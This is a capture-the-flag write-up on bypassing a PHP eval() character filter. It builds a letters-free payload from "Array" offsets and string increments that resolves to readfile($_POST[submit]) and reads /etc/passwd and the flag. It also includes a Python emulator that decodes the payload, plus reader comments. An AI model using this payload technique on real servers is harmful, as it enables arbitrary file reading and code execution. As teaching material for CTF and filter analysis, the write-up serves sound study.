Tags: web
Rating: 1.0
# Writeup JAILOO from fword ctf
We have the source of a PHP file that lets us execute commands via PHP's eval(); the problem is a regex that only allows a few characters:
```
if(preg_match_all('/^(\$|\(|\)|\_|\[|\]|\=|\;|\+|\"|\.)*$/', $cmd, $matches)){
    echo "<div class=\"success\">Command executed !</div>";
    eval($cmd); // $cmd reaches eval() as long as every character is in the allowlist above
}
```
This basically means that we need to build a payload without using letters or digits, only the characters the regex allows: ``$()_[]=;+".``
So let's go. I coded a script that converts a string into those characters, using the trick of getting an "A" and an "a" out of a PHP value like Array: `"".[]` is the string "Array", so index 0 gives us "A" and index 3 gives us "a", and PHP's `++` on a string then walks through the alphabet from there.
With that, I started with system():

But apparently it was not enabled, so I tried assert(), but it was disabled too.
So I ended up using readfile(). Since the server only takes two parameters, I reused the submit variable to pass the file I want to read. This means we need a payload like ``readfile($_POST[submit])``.
So let's build the payload. I started with readfile:

Now _POST:

And finally submit:

Putting it all together we get our final payload:
```
$_="".[];$_=$_[""];$__=("+"=="+");$__=$__+$__+$__;$____="".[];$___=$____[$__];$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$____.=$__;$__=$_;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$______=$____;$_="".[];$_=$_[""];$__=("+"=="+");$__=$__+$__+$__;$____="".[];$___=$____[$__];$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____=$__;$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$___;$__++;$____.=$__;$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_______=$____;$_____="_";$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$_=$$_____;$______($_[$_______]);
```
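To check what the final payload actually resolves to (handy when triaging this kind of filter bypass in logs), here is an added Python emulator, not the author's payloadgenerator.py, for the handful of statement shapes the payload uses: `"".[]` yielding "Array", string offsets, boolean arithmetic, PHP's string `++`, `.=` and `$$var`. It runs over a constructed payload assembled with the same statement shapes and increment counts as the one above, with a placeholder POST value; the result shows the call resolves to READFILE($_POST["submit"]), which works because PHP function names are case-insensitive.

```python
import re

def php_increment(s: str) -> str:
    """PHP's ++ on a string: "a"->"b", "z"->"aa", "Az"->"Ba"; a non-alphanumeric stops the carry."""
    chars = list(s)
    for i in range(len(s) - 1, -1, -1):
        if chars[i] in "zZ9":                           # wrap and carry into the next position
            chars[i] = {"z": "a", "Z": "A", "9": "0"}[chars[i]]
        else:
            if chars[i].isalnum():
                chars[i] = chr(ord(chars[i]) + 1)
            break
    else:                                               # carried out of the leftmost character
        chars.insert(0, {"z": "a", "Z": "A"}.get(s[:1], "1"))
    return "".join(chars)

def decode(payload: str, post: dict):
    """Interpret the statement shapes the payload uses; return (function, argument) of the final call."""
    env = {"_POST": post}                                # superglobal reachable through $$name
    for stmt in filter(None, payload.split(";")):
        if m := re.fullmatch(r'\$(\w+)=""\.\[\]', stmt):
            env[m[1]] = "Array"                          # "" . [] -> "Array"
        elif m := re.fullmatch(r'\$(\w+)=\("\+"=="\+"\)', stmt):
            env[m[1]] = 1                                # true counts as 1 in arithmetic
        elif m := re.fullmatch(r'\$(\w+)=\$(\w+)\+\$(\w+)\+\$(\w+)', stmt):
            env[m[1]] = env[m[2]] + env[m[3]] + env[m[4]]
        elif m := re.fullmatch(r'\$(\w+)=\$(\w+)\[(""|\$\w+)\]', stmt):
            key = 0 if m[3] == '""' else env[m[3][1:]]   # PHP 7 casts the "" offset to 0
            env[m[1]] = env[m[2]][key]
        elif m := re.fullmatch(r'\$(\w+)=\$\$(\w+)', stmt):
            env[m[1]] = env[env[m[2]]]                   # variable variable: $$x is $<value of x>
        elif m := re.fullmatch(r'\$(\w+)(\.?)=\$(\w+)', stmt):
            env[m[1]] = (env[m[1]] if m[2] else "") + env[m[3]]   # plain copy or .= append
        elif m := re.fullmatch(r'\$(\w+)="([^"]*)"', stmt):
            env[m[1]] = m[2]                             # plain literal such as "_"
        elif m := re.fullmatch(r'\$(\w+)\+\+', stmt):
            env[m[1]] = php_increment(env[m[1]])
        elif m := re.fullmatch(r'\$(\w+)\(\$(\w+)\[\$(\w+)\]\)', stmt):
            return env[m[1]], env[m[2]][env[m[3]]]       # the sink: function($var[key])
        else:
            raise ValueError(f"unsupported statement: {stmt}")

# Constructed test payload with the same statement shapes and increment counts as the writeup's:
# copy the seed letter ("A" or "a"), ++ it n times, append the result to the destination variable.
SETUP = '$_="".[];$_=$_[""];$__=("+"=="+");$__=$__+$__+$__;$____="".[];$___=$____[$__];'
def _word(dest, seed, counts):
    return "".join(f"$__=${seed};" + "$__++;" * n + f"${dest}.=$__;" for n in counts)
PAYLOAD = (SETUP + '$____="";' + _word("____", "_", [17, 4, 0, 3, 5, 8, 11, 4]) + "$______=$____;"
           + '$____="";' + _word("____", "___", [18, 20, 1, 12, 8, 19]) + "$_______=$____;"
           + '$_____="_";' + _word("_____", "_", [15, 14, 18, 19]) + "$_=$$_____;$______($_[$_______]);")
```

`decode(PAYLOAD, {"submit": "flag-placeholder"})` returns `("READFILE", "flag-placeholder")`; any statement shape outside the allowlisted grammar raises instead of being guessed.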
We just need to request the files we want to read through the POST parameter submit.
Trying with /etc/passwd:

Getting the flag:

$_POST['submit'] gets stored in $submit before the eval, so you could've skipped a bunch of payload there :) Then again, hardcoding 'FLAG.PHP' is even shorter than 'submit' and skips the need to pass anything in the submit parameter, so you can just copy-paste to the actual form instead of using curl, burp, etc.
where's the payloadgenerator.py?